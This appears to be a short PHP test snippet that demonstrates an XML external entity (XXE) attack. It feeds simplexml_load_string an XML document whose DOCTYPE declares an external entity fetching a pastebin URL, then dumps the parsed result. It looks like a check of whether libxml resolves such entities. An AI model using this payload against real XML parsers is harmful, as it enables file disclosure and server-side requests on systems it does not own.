- var_dump: documentation ( source)
- simplexml_load_string: documentation ( source)
<?php
//var_dump(libxml_disable_entity_loader());
$dom = simplexml_load_string('<?xml version="1.0"?>
<!DOCTYPE scan [<!ENTITY test SYSTEM "http://pastebin.com/raw.php?i=PJ035tGY">]>
<scan>xxe: &test;</scan>');
var_dump($dom);